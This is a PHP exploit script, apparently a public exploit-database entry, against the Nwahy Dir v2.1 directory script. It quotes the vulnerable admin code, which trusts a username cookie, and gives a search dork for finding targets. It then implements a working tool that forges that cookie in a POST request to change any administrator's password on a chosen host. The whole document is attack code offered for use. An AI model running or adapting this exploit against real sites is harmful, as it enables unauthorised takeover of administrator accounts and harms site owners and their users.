<?

 /*

   [ Nwahy Dir v2.1 Change Admin Password Exploit ]        
   
  [-] Author        : rEcruit
  [-] Mail            : recru1t[@]ymail.com
  [-] Download   : http://nwahy.com/showdownload-3105.html
  
  [-] Vuln in  ./admincp/admininfo.php
  
   [code]
   
   $u = addslashes($_COOKIE['username']);
   $query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed");
   $counts = mysql_num_rows($query);
   if($counts == 0){
   echo "<div align='center'>......................</div>";
   }else{
    
   [/code]
   
  [-] Works On :
  
   1. Nwahy Articles v1
    
   2. Nwahy scripts v1

   3. Nwahy book v1
   
  [-] Note : Path to Control Panel   "/admincp/" .

 */

 error_reporting(0);
 ini_set("max_execution_time",0);
 ini_set("default_socket_timeout",5);

 function Usage()
 {
   print "\n\n";
   print "/------------------------------------------------------------\\\n";
   print "|        Nwahy Dir v2.1 Change Admin Password Exploit        |\n";
   print "\------------------------------------------------------------/\n";
   print "| [-] Author : rEcruit                                       |\n";
   print "| [-] Mail   : recru1t@ymail.com                             |\n";
   print "| [-] Greetz : RAGE SCREAM  , SAUDI L0rD , Fantastic Egypt   |\n";
   print "\------------------------------------------------------------/\n";
   print "| [-] Dork     : Nwahy.com 2.1 , inurl:'add-site.html'       |\n";
   print "| [+] Usage    : php Exploit.php HOST PATH Options           |\n";
   print "| [-] HOST     : Target server (ip/hostname)                 |\n";
   print "| [-] PATH     : Path to Nwahy Dir                           |\n";
   print "| [-] Options  :                                             |\n";
   print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |\n";
   print "\------------------------------------------------------------/\n";
   print "\n\n";

  exit;
 }

 function Send()
 {
  Global $host,$path,$user,$pwd,$proxy;
  
  if(empty($proxy))
  {
   $Connect = @fsockopen($host,"80") or die("[-] Bad Host .");
  }else{
   $proxy  = explode(":",$proxy);
   $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
  }
  
   $Payload = "username={$user}&password={$pwd}";
   $Packet  .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
   $Packet  .= "Host: {$host}\r\n";
   $Packet  .= "Cookie: username={$user}\r\n";
   $Packet  .= "X-Forwarded-For: 127.0.0.1\r\n";
   $Packet  .= "Content-Type: application/x-www-form-urlencoded\r\n";
   $Packet  .= "Content-Length: ".(strlen($Payload))."\r\n";
   $Packet  .= "Connection: close\r\n\r\n";
   $Packet  .= $Payload;

    fputs($Connect,$Packet);

    while(!feof($Connect))
    $Response .= @fgets($Connect,2048);

    fclose($Connect);
  
  return $Response;
 }
 
 
 function Login()
 {
  $Response = @Send();

   if(eregi("refresh",$Response))
   {
    $msg = "[-] Password changed .\n";
   }
   elseif(eregi("<div align='center'>",$Response))
   {
    $msg = "[-] Bad username .\n";
   }
   else
   {
    $msg = "[-] Exploit failed .\n";
   }

  return $msg;
 }

 if ($argc < 3) Usage();

 $host = $argv[1];
 $path = $argv[2];;
 $proxy = $argv[3];

 
  Print "\r\n[-] Connecting to {$host} .... \r\n";
  
  while(1)
  {
   Print "[-] Username: ";

   if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
   {
    Print "[-] New password: ";

    if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
    {
     Print Login();
     exit;
    }

   }

  } //end while

?>